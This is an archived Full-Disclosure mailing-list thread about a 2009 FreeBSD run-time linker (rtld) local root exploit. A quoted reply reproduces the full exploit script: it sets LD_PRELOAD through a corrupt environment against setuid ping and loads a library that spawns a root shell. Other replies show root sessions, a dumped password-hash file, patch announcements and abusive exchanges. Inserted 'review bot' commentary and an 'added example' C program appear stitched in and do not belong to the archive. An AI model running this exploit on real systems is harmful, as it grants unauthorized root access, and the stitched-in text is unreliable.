Re: [Full-disclosure] ** FreeBSD local r00t zeroday

2009-12-05 Thread RandallM
 --

 Message: 1
 Date: Fri, 4 Dec 2009 21:40:27 -0600
 From: Chris r...@operamail.com
 Subject: Re: [Full-disclosure] ** FreeBSD local r00t zeroday
 To: Benji m...@b3nji.com
 Cc: r00f r00f r00f...@gmail.com, full-disclosure@lists.grok.org.uk
 Message-ID: 20091205034027.12bce7b...@ws5-10.us4.outblaze.com
 Content-Type: text/plain; charset=iso-8859-1

 You're as thick as that other moron.  Congrats on achieving Moron #2 status.

 I didn't say I *POSTED*  the code.  I told Moron #1 to read it.

 The two errors I highlighted were merely clues so Moron #1 could unfuck 
 himself.



 - Original Message -
 From: Benji m...@b3nji.com
 To: Chris r...@operamail.com
 Cc: r00f r00f r00f...@gmail.com, full-disclosure@lists.grok.org.uk
 Subject: Re: [Full-disclosure] ** FreeBSD local r00t zeroday
 Date: Wed, 2 Dec 2009 14:30:09 +


 Just FYI, what you posted isn't code, but actually an error message. Just 
 FYI.



I think it should be a mandate that morning coffee along with
exercise be done before reading mail.

-- 
been great, thanks
a.k.a System

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] ** FreeBSD local r00t zeroday

2009-12-04 Thread Chris
You're as thick as that other moron.  Congrats on achieving Moron #2 status.

I didn't say I *POSTED*  the code.  I told Moron #1 to read it.  

The two errors I highlighted were merely clues so Moron #1 could unfuck himself.



 - Original Message -
 From: Benji m...@b3nji.com
 To: Chris r...@operamail.com
 Cc: r00f r00f r00f...@gmail.com, full-disclosure@lists.grok.org.uk
 Subject: Re: [Full-disclosure] ** FreeBSD local r00t zeroday
 Date: Wed, 2 Dec 2009 14:30:09 +
 
 
 Just FYI, what you posted isn't code, but actually an error message. Just FYI.
 
 On Wednesday, December 2, 2009, Chris r...@operamail.com wrote:
  r00f, you moron.  Read the fucking code.  Everything you need to 
  know is in the fucking exploit.  If you can't grasp it, you have 
  no business running it.
 
  c1: error: unrecognized command line option -fPIC
               ^^^
  gcc: program.o: No such file or directory
                    ^
 
  If you want point-and-click exploits, go back to windows.  Asshat.
 
 
 


Re: [Full-disclosure] ** FreeBSD local r00t zeroday

2009-12-02 Thread Nicolas RUFF
 Is that the Debian userland/FreeBSD kernel thingy?

I fear it is 

Linux freebsd2 2.4.2 FreeBSD 7.1-RELEASE #0: Thu Jan  1 14:37:25 UTC
2009 i686 i686 i386 GNU/Linux

I guess apt-get install local-r00t should work on that system :)

Regards,
- Nicolas RUFF



Re: [Full-disclosure] ** FreeBSD local r00t zeroday

2009-12-02 Thread McGhee, Eddie
HE HAS THE GCC INSTALLED, FJEER.


From: full-disclosure-boun...@lists.grok.org.uk 
[mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of r00f r00f
Sent: 01 December 2009 17:59
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] ** FreeBSD local r00t zeroday

From: Oliver Pinter oliver.pinter () gmail com
Date: Tue, 1 Dec 2009 18:28:33 +0100


On Tuesday 01 December 2009 12.59.59 r00f r00f wrote:

I have a box with release 7.1


uname -a gives back this :

FreeBSD 7.1-RELEASE #0: Thu Jan  1 14:37:25 UTC 2009 i686 i686 i386
GNU/Linux

and a freebsd uname -a looks like this:.

It gives me this:

Linux freebsd2 2.4.2 FreeBSD 7.1-RELEASE #0: Thu Jan  1 14:37:25 UTC 2009 i686 
i686 i386 GNU/Linux

From: FBI BOT terdlinkmobile () gmail com
Date: Tue, 1 Dec 2009 12:03:01 -0500


LOL r00f r00f didn't have gcc installed :-O

OMG, what are you saying??

I have gcc installed, my friend.. I have just compiled a .c file..

and if I type gcc it returns

gcc: No input files specified

Ok ?

Thanks!




Re: [Full-disclosure] ** FreeBSD local r00t zeroday

2009-12-02 Thread Chris
r00f, you moron.  Read the fucking code.  Everything you need to know is in the 
fucking exploit.  If you can't grasp it, you have no business running it.

c1: error: unrecognized command line option -fPIC
 ^^^
 gcc: program.o: No such file or directory
  ^

If you want point-and-click exploits, go back to windows.  Asshat.




Re: [Full-disclosure] ** FreeBSD local r00t zeroday

2009-12-02 Thread Benji
Just FYI, what you posted isn't code, but actually an error message. Just FYI.

On Wednesday, December 2, 2009, Chris r...@operamail.com wrote:
 r00f, you moron.  Read the fucking code.  Everything you need to know is in 
 the fucking exploit.  If you can't grasp it, you have no business running it.

c1: error: unrecognized command line option -fPIC
              ^^^
 gcc: program.o: No such file or directory
                   ^

 If you want point-and-click exploits, go back to windows.  Asshat.




Re: [Full-disclosure] ** FreeBSD local r00t zeroday

2009-12-01 Thread Oliver Pinter
On Tuesday 01 December 2009 06.45.38 bk wrote:
 On Nov 30, 2009, at 9:25 PM, David Berard wrote:
  7.0 not vuln.
 
  7.0 vulnerable here,
 
  $ ./env
  /libexec/ld-elf.so.1: environment corrupt; missing value for
  /libexec/ld-elf.so.1: environment corrupt; missing value for
  /libexec/ld-elf.so.1: environment corrupt; missing value for
  /libexec/ld-elf.so.1: environment corrupt; missing value for
  /libexec/ld-elf.so.1: environment corrupt; missing value for
  ALEX-ALEX
  # uname -r
  7.0-RELEASE-p3

 Here as well:

 bin/Kingcope.sh: new file: 35 lines, 772 characters.
 [ch...@demon ~]$ chmod +x bin/Kingcope.sh
 [ch...@demon ~]$ Kingcope.sh
 bin ktrace.out scratch vent_stalk FreeBSD local r00t zeroday
 by Kingcope
 November 2009
 env.c: In function 'main':
 env.c:5: warning: incompatible implicit declaration of built-in function
 'malloc' env.c:9: warning: incompatible implicit declaration of built-in
 function 'strcpy' env.c:11: warning: incompatible implicit declaration of
 built-in function 'execl' /libexec/ld-elf.so.1: environment corrupt;
 missing value for
 /libexec/ld-elf.so.1: environment corrupt; missing value for
 /libexec/ld-elf.so.1: environment corrupt; missing value for
 /libexec/ld-elf.so.1: environment corrupt; missing value for
 /libexec/ld-elf.so.1: environment corrupt; missing value for
 ALEX-ALEX
 # whoami
 root
 # uname -a
 FreeBSD demon.smtps.net 7.0-RELEASE FreeBSD 7.0-RELEASE #0: Sun Feb 24
 19:59:52 UTC 2008
 r...@logan.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  i386

 It's a VM if that matters.

 --
 chort


with cperciva's patch:

o...@oliverp exploit ./local_root_exploit_env.sh
local_root_exploit_env.sh FreeBSD local r00t zeroday
by Kingcope
November 2009
env.c: In function 'main':
env.c:5: warning: incompatible implicit declaration of built-in 
function 'malloc'
env.c:9: warning: incompatible implicit declaration of built-in 
function 'strcpy'
env.c:11: warning: incompatible implicit declaration of built-in 
function 'execl'
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; aborting


-- 
thanks,
Oliver



Re: [Full-disclosure] ** FreeBSD local r00t zeroday

2009-12-01 Thread r00f r00f
I have a box with release 7.1

uname -a gives back this :

FreeBSD 7.1-RELEASE #0: Thu Jan  1 14:37:25 UTC 2009 i686 i686 i386
GNU/Linux

by running the exploit it gives me this error and doesn't get rooted.. I
didn't do anything to patch it .. :s and it doesn't work :p

FreeBSD local r00t zeroday
by Kingcope
November 2009
env.c: In function 'main':
env.c:5: warning: incompatible implicit declaration of built-in function
'malloc'
env.c:9: warning: incompatible implicit declaration of built-in function
'strcpy'
env.c:11: warning: incompatible implicit declaration of built-in function
'execl'
c1: error: unrecognized command line option -fPIC
gcc: program.o: No such file or directory
'cc: unrecognized option '-nostartfiles
cp: cannot stat `w00t.so.1.0': No such file or directory
test.sh: line 35: ./env: No such file or directory

Re: [Full-disclosure] ** FreeBSD local r00t zeroday

2009-12-01 Thread Colin Percival

Hi all,

A short time ago a local root exploit was posted to the full-disclosure
mailing list; as the name suggests, this allows a local user to execute
arbitrary code as root.

Normally it is the policy of the FreeBSD Security Team to not publicly
discuss security issues until an advisory is ready, but in this case
since exploit code is already widely available I want to make a patch
available ASAP.  Due to the short timeline, it is possible that this
patch will not be the final version which is provided when an advisory
is sent out; it is even possible (although highly doubtful) that this
patch does not fully fix the issue or introduces new issues -- in short,
use at your own risk (even more than usual).

The patch is at
  http://people.freebsd.org/~cperciva/rtld.patch
and has SHA256 hash
  ffcba0c20335dd83e9ac0d0e920faf5b4aedf366ee5a41f548b95027e3b770c1

I expect a full security advisory concerning this issue will go out on
Wednesday December 2nd.

-- 
Colin Percival
Security Officer, FreeBSD | freebsd.org | The power to serve
Founder / author, Tarsnap | tarsnap.com | Online backups for the truly paranoid



Re: [Full-disclosure] ** FreeBSD local r00t zeroday

2009-12-01 Thread David Berard
 The patch is at
  http://people.freebsd.org/~cperciva/rtld.patch
 

This patch doesn't work under FreeBSD 7.x due to the nonexistent
unsetenv("LD_ELF_HINTS_PATH"); in rtld.c


This patch seems to fix the issue on FreeBSD 7.x

--- /usr/src/libexec/rtld-elf/rtld.c2008-11-25 03:59:29.0 +0100
+++ /usr/src/libexec/rtld-elf/rtld.c.new2009-12-01 13:09:15.0 
+0100
@@ -358,11 +358,12 @@
  * future processes to honor the potentially un-safe variables.
  */
 if (!trust) {
-unsetenv(LD_ PRELOAD);
-unsetenv(LD_ LIBMAP);
-unsetenv(LD_ LIBRARY_PATH);
-unsetenv(LD_ LIBMAP_DISABLE);
-unsetenv(LD_ DEBUG);
+   if (unsetenv(LD_ PRELOAD) || unsetenv(LD_ LIBMAP) ||
+   unsetenv(LD_ LIBRARY_PATH) || unsetenv(LD_ 
LIBMAP_DISABLE) ||
+   unsetenv(LD_ DEBUG)) {
+   _rtld_error(environment corrupt; aborting);
+   die();
+   }
 }
 ld_debug = getenv(LD_ DEBUG);
 libmap_disable = getenv(LD_ LIBMAP_DISABLE) != NULL;
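Review bot: the essential change is right: the five unsetenv() calls in the removed lines discard their return value, so a corrupt environment (an entry with no '=', which is exactly what the posted env.c hands the loader) left LD_PRELOAD in place for the setugid program, and the replacement calls die() through _rtld_error() as soon as any unsetenv() fails. Two points before anyone applies this as posted: the string literals have lost their quotes in transit (unsetenv(LD_ PRELOAD) and _rtld_error(environment corrupt; aborting) will not compile, and the unsetenv(LD_ / LIBMAP_DISABLE) || call is wrapped across two lines), so the hunk has to be re-typed rather than fed to patch(1); and, consistent with the note above that 7.x has no unsetenv(LD_ELF_HINTS_PATH) call, that variable is not in this list, so on 7.x the abort covers only the five variables shown in the hunk.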

Best Regards.

--
David BERARD
-
23 Boulevard MARENGO, Appartement A15
31500 TOULOUSE
contact(at)davidberard.fr
GPG|PGP KeyId 0xC8533354
GPG|PGP Key http://davidberard.fr/C8533354.gpgkey
-
*  No electrons were harmed in  *
* the transmission of this email*




Re: [Full-disclosure] ** FreeBSD local r00t zeroday

2009-12-01 Thread Benji
Not to disappoint, but it doesn't look like it even compiled, might be  
the reason it didn't work.

Sent from my iPhone

On 1 Dec 2009, at 11:59, r00f r00f r00f...@gmail.com wrote:

 I have a box with release 7.1

 uname -a gives back this :

 FreeBSD 7.1-RELEASE #0: Thu Jan  1 14:37:25 UTC 2009 i686 i686 i386  
 GNU/Linux

 by running the exploit it gives me this error and doesn't get
 rooted.. I didn't do anything to patch it .. :s and it doesn't work :p

 FreeBSD local r00t zeroday
 by Kingcope
 November 2009
 env.c: In function 'main':
 env.c:5: warning: incompatible implicit declaration of built-in  
 function 'malloc'
 env.c:9: warning: incompatible implicit declaration of built-in  
 function 'strcpy'
 env.c:11: warning: incompatible implicit declaration of built-in  
 function 'execl'
 c1: error: unrecognized command line option -fPIC
 gcc: program.o: No such file or directory
 'cc: unrecognized option '-nostartfiles
 cp: cannot stat `w00t.so.1.0': No such file or directory
 test.sh: line 35: ./env: No such file or directory



Re: [Full-disclosure] ** FreeBSD local r00t zeroday

2009-12-01 Thread Robert Portvliet
Confirmed on FreeBSD 8.0


$ uname -a
FreeBSD  8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21 15:48:17 UTC
2009 r...@almeida.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC
i386
$ id
uid=1001(rportvli) gid=1001(rportvli) groups=1001(rportvli)
$ ./freebsd-0day.sh
Desktop env env.c freebsd-0day.sh program.c program.o w00t.so.1.0
FreeBSD local r00t zeroday
by Kingcope
November 2009
env.c: In function 'main':
env.c:5: warning: incompatible implicit declaration of built-in
function 'malloc'
env.c:9: warning: incompatible implicit declaration of built-in
function 'strcpy'
env.c:11: warning: incompatible implicit declaration of built-in
function 'execl'
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
ALEX-ALEX
# id
uid=1001(rportvli) gid=1001(rportvli) euid=0(root) groups=1001(rportvli)
#



On Mon, Nov 30, 2009 at 6:31 PM, phantomcircuit
phantomcirc...@covertinferno.org wrote:
 Confirmed on 7.2-RELEASE-p4 fully patched according to freebsd-update.

 %sh exploit.sh
 Desktop env env.c exploit exploit.c exploit.sh payload.c payload.o
 private program.c program.o public public_html run.sh w00t.so.1.0
 FreeBSD local r00t zeroday
 by Kingcope
 November 2009
 env.c: In function 'main':
 env.c:5: warning: incompatible implicit declaration of built-in function
 'malloc'
 env.c:9: warning: incompatible implicit declaration of built-in function
 'strcpy'
 env.c:11: warning: incompatible implicit declaration of built-in
 function 'execl'
 /libexec/ld-elf.so.1: environment corrupt; missing value for
 /libexec/ld-elf.so.1: environment corrupt; missing value for
 /libexec/ld-elf.so.1: environment corrupt; missing value for
 /libexec/ld-elf.so.1: environment corrupt; missing value for
 /libexec/ld-elf.so.1: environment corrupt; missing value for
 ALEX-ALEX
 # id
 uid=1001(phantomcircuit) gid=20(staff) euid=0(root)
 groups=20(staff),0(wheel)
 # uname -a
 FreeBSD phantomcircuit.mine.nu 7.2-RELEASE-p4 FreeBSD 7.2-RELEASE-p4 #0:
 Fri Oct  2 12:21:39 UTC 2009
 r...@i386-builder.daemonology.net:/usr/obj/usr/src/sys/GENERIC  i386
 #



Re: [Full-disclosure] ** FreeBSD local r00t zeroday

2009-12-01 Thread Dawid Golunski
Confirmed on FreeBSD 7.2-RELEASE (GENERIC).

Dawid

On 30 Nov 2009, at 22:12, Kingcope wrote:

 ** FreeBSD local r00t 0day
 Discovered & Exploited by Nikolaos Rangos, also known as Kingcope.
 Nov 2009 BiG TiME

 Go fetch your FreeBSD r00tkitz // http://www.youtube.com/watch?v=dDnhthI27Fg

 There is an unbelievably simple local r00t bug in recent FreeBSD versions.
 I audited FreeBSD for local r00t bugs a long time *sigh*. Now it  
 pays out.

 The bug resides in the Run-Time Link-Editor (rtld).
 Normally rtld does not allow dangerous environment variables like  
 LD_PRELOAD
 to be set when executing setugid binaries like ping or su.
 With a rather simple technique rtld can be tricked into
 accepting LD variables even on setugid binaries.
 See the attached exploit for details.

 Example exploiting session
 **
 %uname -a;id;
 FreeBSD r00tbox.Belkin 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21
 15:48:17 UTC 2009
 r...@almeida.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  i386
 uid=1001(kcope) gid=1001(users) groups=1001(users)
 %./w00t.sh
 FreeBSD local r00t zeroday
 by Kingcope
 November 2009
 env.c: In function 'main':
 env.c:5: warning: incompatible implicit declaration of built-in
 function 'malloc'
 env.c:9: warning: incompatible implicit declaration of built-in
 function 'strcpy'
 env.c:11: warning: incompatible implicit declaration of built-in
 function 'execl'
 /libexec/ld-elf.so.1: environment corrupt; missing value for
 /libexec/ld-elf.so.1: environment corrupt; missing value for
 /libexec/ld-elf.so.1: environment corrupt; missing value for
 /libexec/ld-elf.so.1: environment corrupt; missing value for
 /libexec/ld-elf.so.1: environment corrupt; missing value for
 /libexec/ld-elf.so.1: environment corrupt; missing value for
 ALEX-ALEX
 # uname -a;id;
 FreeBSD r00tbox.Belkin 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21
 15:48:17 UTC 2009
 r...@almeida.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  i386
 uid=1001(kcope) gid=1001(users) euid=0(root) groups=1001(users)
 # cat /etc/master.passwd
 # $FreeBSD: src/etc/master.passwd,v 1.40.22.1.2.1 2009/10/25 01:10:29
 kensmith Exp $
 #
 root:$1$AUbbHoOs$CCCsw7hsMB14KBkeS1xlz2:0:0::0:0:Charlie :/root:/ 
 bin/csh
 toor:*:0:0::0:0:Bourne-again Superuser:/root:
 daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/ 
 nologin
 operator:*:2:5::0:0:System :/:/usr/sbin/nologin
 bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin
 tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin
 kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin
 games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin
 news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin
 man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
 sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
 smmsp:*:25:25::0:0:Sendmail Submission
 User:/var/spool/clientmqueue:/usr/sbin/nologin
 mailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/usr/ 
 sbin/nologin
 bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin
 proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/ 
 nologin
 _pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin
 _dhcp:*:65:65::0:0:dhcp programs:/var/empty:/usr/sbin/nologin
 uucp:*:66:66::0:0:UUCP
 pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
 pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin
 www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
 nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/ 
 nologin
 kcope:$1$u2wMkYLY$CCCuKax6dvYJrl2ZCYXA2:1001:1001::0:0:User
 :/home/kcope:/bin/sh
 #

 Systems tested/affected
 **
 FreeBSD 8.0-RELEASE *** VULNERABLE
 FreeBSD 7.1-RELEASE *** VULNERABLE
 FreeBSD 6.3-RELEASE *** NOT VULN
 FreeBSD 4.9-RELEASE *** NOT VULN

 *EXPLOIT*

 #!/bin/sh
 # the unquoted ** below globs the current directory, which is why every
 # posted session shows a file listing in front of the banner
 echo ** FreeBSD local r00t zeroday
 echo by Kingcope
 echo November 2009
 cat > env.c << _EOF
 #include <stdio.h>

 main() {
     extern char **environ;
     environ = (char**)malloc(8096);

     environ[0] = (char*)malloc(1024);
     environ[1] = (char*)malloc(1024);
     strcpy(environ[1], "LD_PRELOAD=/tmp/w00t.so.1.0");

     execl("/sbin/ping", "ping", 0);
 }
 _EOF
 gcc env.c -o env
 cat > program.c << _EOF
 #include <unistd.h>
 #include <stdio.h>
 #include <sys/types.h>
 #include <stdlib.h>

 void _init() {
     extern char **environ;
     environ=NULL;
     system("echo ALEX-ALEX;/bin/sh");
 }
 _EOF
 gcc -o program.o -c program.c -fPIC
 gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -nostartfiles
 cp w00t.so.1.0 /tmp/w00t.so.1.0
 ./env


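Added example (mine, not FreeBSD's rtld and not the patch posted upthread): a C model of the fail-closed check David Berard's hunk adds, fed the two environments that matter in this thread, a normal one carrying LD_PRELOAD and the exploit's shape with a name-only entry in front of it. env_is_well_formed, scrub_unsafe_env and the constructed sample environments are this example's own names; the variable list is the one from the hunk plus LD_ELF_HINTS_PATH, which David says 8.x also unsets.

```c
/* Fail-closed environment scrubbing for a privileged loader.
 * Added example modelled on the rtld fix in this thread; not FreeBSD code. */
#include <stdio.h>
#include <string.h>

/* Variables the loader must not honour for setugid programs: the five in
 * the posted 7.x hunk plus LD_ELF_HINTS_PATH (8.x, per the thread). */
static const char *const unsafe_vars[] = {
    "LD_PRELOAD", "LD_LIBMAP", "LD_LIBRARY_PATH",
    "LD_LIBMAP_DISABLE", "LD_DEBUG", "LD_ELF_HINTS_PATH", NULL
};

/* 0 if every entry is NAME=value with a non-empty NAME, else -1.
 * The posted env.c hands the loader an environ[0] that was malloc()ed and
 * never written, i.e. an entry with no '=' (the sessions show an empty
 * name: "missing value for "), which is what makes unsetenv() fail. */
int env_is_well_formed(char *const *env)
{
    for (size_t i = 0; env[i] != NULL; i++) {
        const char *eq = strchr(env[i], '=');
        if (eq == NULL || eq == env[i])
            return -1;
    }
    return 0;
}

/* Drop every unsafe variable from env in place.  Returns how many entries
 * were removed, or -1 without touching env when the environment is corrupt.
 * -1 is the case the unpatched rtld ignored: the caller must end the
 * process, never fall through to exec with LD_PRELOAD still present. */
int scrub_unsafe_env(char **env)
{
    if (env_is_well_formed(env) != 0)
        return -1;

    int removed = 0;
    size_t w = 0;
    for (size_t r = 0; env[r] != NULL; r++) {
        size_t namelen = (size_t)(strchr(env[r], '=') - env[r]);
        int unsafe = 0;
        for (int k = 0; unsafe_vars[k] != NULL; k++) {
            if (strlen(unsafe_vars[k]) == namelen &&
                memcmp(unsafe_vars[k], env[r], namelen) == 0) {
                unsafe = 1;
                break;
            }
        }
        if (unsafe)
            removed++;
        else
            env[w++] = env[r];   /* compact survivors, order preserved */
    }
    env[w] = NULL;
    return removed;
}

/* Constructed sample 1: an ordinary environment carrying LD_PRELOAD.
 * Returns the number of removed entries (1) after checking the survivors. */
int demo_clean_env(void)
{
    char e0[] = "PATH=/bin:/usr/bin";
    char e1[] = "LD_PRELOAD=/tmp/w00t.so.1.0";
    char e2[] = "HOME=/home/user";
    char *env[] = { e0, e1, e2, NULL };

    int removed = scrub_unsafe_env(env);
    if (env[0] != e0 || env[1] != e2 || env[2] != NULL)
        return -2;               /* survivors not kept in order */
    return removed;
}

/* Constructed sample 2: the exploit's shape, a name-only entry ahead of
 * LD_PRELOAD.  Returns -1 with env untouched: the loader must die() here. */
int demo_corrupt_env(void)
{
    char e0[] = "";              /* models the never-written malloc()ed environ[0] */
    char e1[] = "LD_PRELOAD=/tmp/w00t.so.1.0";
    char *env[] = { e0, e1, NULL };

    int rc = scrub_unsafe_env(env);
    if (env[1] != e1)            /* nothing may have been modified on failure */
        return -2;
    return rc;
}

int main(void)
{
    printf("clean env: removed %d unsafe entries\n", demo_clean_env());
    printf("corrupt env: scrub returned %d (abort, do not exec)\n",
           demo_corrupt_env());
    return 0;
}
```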
Re: [Full-disclosure] ** FreeBSD local r00t zeroday

2009-12-01 Thread FBI BOT
LOL r00f r00f didn't have gcc installed :-O

Re: [Full-disclosure] ** FreeBSD local r00t zeroday

2009-12-01 Thread Oliver Pinter
On Tuesday 01 December 2009 12.59.59 r00f r00f wrote:
 I have a box with release 7.1

 uname -a gives back this :

 FreeBSD 7.1-RELEASE #0: Thu Jan  1 14:37:25 UTC 2009 i686 i686 i386
 GNU/Linux

and a freebsd uname -a looks like this:

FreeBSD foobarbaz 7.2-STABLE FreeBSD 7.2-STABLE #21 r199967+31134af: Tue Dec  
1 02:54:53 CET 2009 r...@foobarbaz:/usr/obj/usr/src/sys/stable  amd64

but it's a good shot ;)



 by running the exploit it gives me this error and doesn't get rooted.. I
 didn't do anything to patch it .. :s and it doesn't work :p

 FreeBSD local r00t zeroday
 by Kingcope
 November 2009
 env.c: In function 'main':
 env.c:5: warning: incompatible implicit declaration of built-in function
 'malloc'
 env.c:9: warning: incompatible implicit declaration of built-in function
 'strcpy'
 env.c:11: warning: incompatible implicit declaration of built-in function
 'execl'
 c1: error: unrecognized command line option -fPIC
 gcc: program.o: No such file or directory
 'cc: unrecognized option '-nostartfiles
 cp: cannot stat `w00t.so.1.0': No such file or directory
 test.sh: line 35: ./env: No such file or directory



-- 
thanks,
Oliver



Re: [Full-disclosure] ** FreeBSD local r00t zeroday

2009-12-01 Thread r00f r00f

 *From*: Oliver Pinter oliver.pinter () gmail com
 *Date*: Tue, 1 Dec 2009 18:28:33 +0100
 --

 On Tuesday 01 December 2009 12.59.59 r00f r00f wrote:

 I have a box with release 7.1

 uname -a gives back this :

 FreeBSD 7.1-RELEASE #0: Thu Jan  1 14:37:25 UTC 2009 i686 i686 i386
 GNU/Linux

 and a freebsd uname -a looks like this:.


It gives me this:

Linux freebsd2 2.4.2 FreeBSD 7.1-RELEASE #0: Thu Jan  1 14:37:25 UTC 2009
i686 i686 i386 GNU/Linux

*From*: FBI BOT terdlinkmobile () gmail com
 *Date*: Tue, 1 Dec 2009 12:03:01 -0500
 --

 LOL r00f r00f didn't have gcc installed :-O


OMG, what are you saying??

I have gcc installed, my friend.. I have just compiled a .c file..

and if I type gcc it returns

gcc: No input files specified

Ok ?

Thanks!

Re: [Full-disclosure] ** FreeBSD local r00t zeroday

2009-12-01 Thread Oliver Pinter
On Tuesday 01 December 2009 18.58.55 r00f r00f wrote:
  *From*: Oliver Pinter oliver.pinter () gmail com
  *Date*: Tue, 1 Dec 2009 18:28:33 +0100
  --
 
  On Tuesday 01 December 2009 12.59.59 r00f r00f wrote:
 
  I have a box with release 7.1
 
  uname -a gives back this :
 
  FreeBSD 7.1-RELEASE #0: Thu Jan  1 14:37:25 UTC 2009 i686 i686 i386
  GNU/Linux
 
  and a freebsd uname -a looks like this:.

 It gives me this:

 Linux freebsd2 2.4.2 FreeBSD 7.1-RELEASE #0: Thu Jan  1 14:37:25 UTC 2009
 i686 i686 i386 GNU/Linux

and what is your: 
sysctl kern.osreldate ?


 *From*: FBI BOT terdlinkmobile () gmail com

  *Date*: Tue, 1 Dec 2009 12:03:01 -0500
  --
 
  LOL r00f r00f didn't have gcc installed :-O

 OMG, what are you saying??

 I have gcc installed, my friend.. I have just compiled a .c file..

 and if I type gcc it returns

 gcc: No input files specified

 Ok ?

 Thanks!



-- 
thanks,
Oliver



Re: [Full-disclosure] ** FreeBSD local r00t zeroday

2009-12-01 Thread r00f r00f
*From*: Oliver Pinter oliver.pinter () gmail com
 *Date*: Tue, 1 Dec 2009 19:13:55 +0100
 --

and what is your:
sysctl kern.osreldate ?


Here it is!

kern.osreldate: 701000

Re: [Full-disclosure] ** FreeBSD local r00t zeroday

2009-12-01 Thread bk


On Dec 1, 2009, at 10:33 AM, r00f r00f wrote:

 
 
 From: Oliver Pinter oliver.pinter () gmail com
 Date: Tue, 1 Dec 2009 19:13:55 +0100
 and what is your: 
 sysctl kern.osreldate ?
 
 Here it is!
 kern.osreldate: 701000


Is that the Debian userland/FreeBSD kernel thingy?

--
chort

Re: [Full-disclosure] ** FreeBSD local r00t zeroday

2009-12-01 Thread Benji
I think we're missing the point here. The exploit didn't compile due to
his/her copy of gcc, which apparently doesn't understand -fPIC
("c1: error: unrecognized command line option -fPIC"). Thus, obviously,
there's no chance it was ever going to work.

On Tue, Dec 1, 2009 at 7:47 PM, bk cho...@gmail.com wrote:



 On Dec 1, 2009, at 10:33 AM, r00f r00f wrote:



 *From*: Oliver Pinter oliver.pinter () gmail com
 *Date*: Tue, 1 Dec 2009 19:13:55 +0100
 --

 and what is your:
 sysctl kern.osreldate ?


 Here it is!

 kern.osreldate: 701000



 Is that the Debian userland/FreeBSD kernel thingy?

 --
 chort


[Full-disclosure] ** FreeBSD local r00t zeroday

2009-12-01 Thread Michał Manterys
http://lists.grok.org.uk/pipermail/full-disclosure/2009-November/071689.html

$ uname -a
FreeBSD serev1.domena.pl 7.2-STABLE FreeBSD 7.2-STABLE #1: Tue Dec  1
19:42:43 CET 2009 r...@server1.domena.pl:/usr/src/sys/i386/compile/kern1
i386
$ ./test.sh
env env.c program.c program.o test.sh w00t.so.1.0 FreeBSD local r00t zeroday
by Kingcope
November 2009
env.c: In function 'main':
env.c:5: warning: incompatible implicit declaration of built-in function
'malloc'
env.c:9: warning: incompatible implicit declaration of built-in function
'strcpy'
env.c:11: warning: incompatible implicit declaration of built-in function
'execl'
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
ALEX-ALEX
#id -a
uid=1018(user) gid=1018(user) euid=0(root) groups=1018(user)

Install patch:
cd /usr/src/libexec/rtld-elf
fetch http://wojciech.sychut.eu/rtld.patch
patch < rtld.patch
make clean
make
make install


and:

$ ./test.sh
env env.c program.c program.o test.sh w00t.so.1.0 FreeBSD local r00t zeroday
by Kingcope
November 2009
env.c: In function 'main':
env.c:5: warning: incompatible implicit declaration of built-in function
'malloc'
env.c:9: warning: incompatible implicit declaration of built-in function
'strcpy'
env.c:11: warning: incompatible implicit declaration of built-in function
'execl'
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
ALEX-ALEX
#id -a
uid=1018(user) gid=1018(user) euid=0(root) groups=1018(user)

[Full-disclosure] ** FreeBSD local r00t zeroday

2009-11-30 Thread Kingcope
** FreeBSD local r00t 0day
Discovered & Exploited by Nikolaos Rangos, also known as Kingcope.
Nov 2009 BiG TiME

Go fetch your FreeBSD r00tkitz // http://www.youtube.com/watch?v=dDnhthI27Fg

There is an unbelievably simple local r00t bug in recent FreeBSD versions.
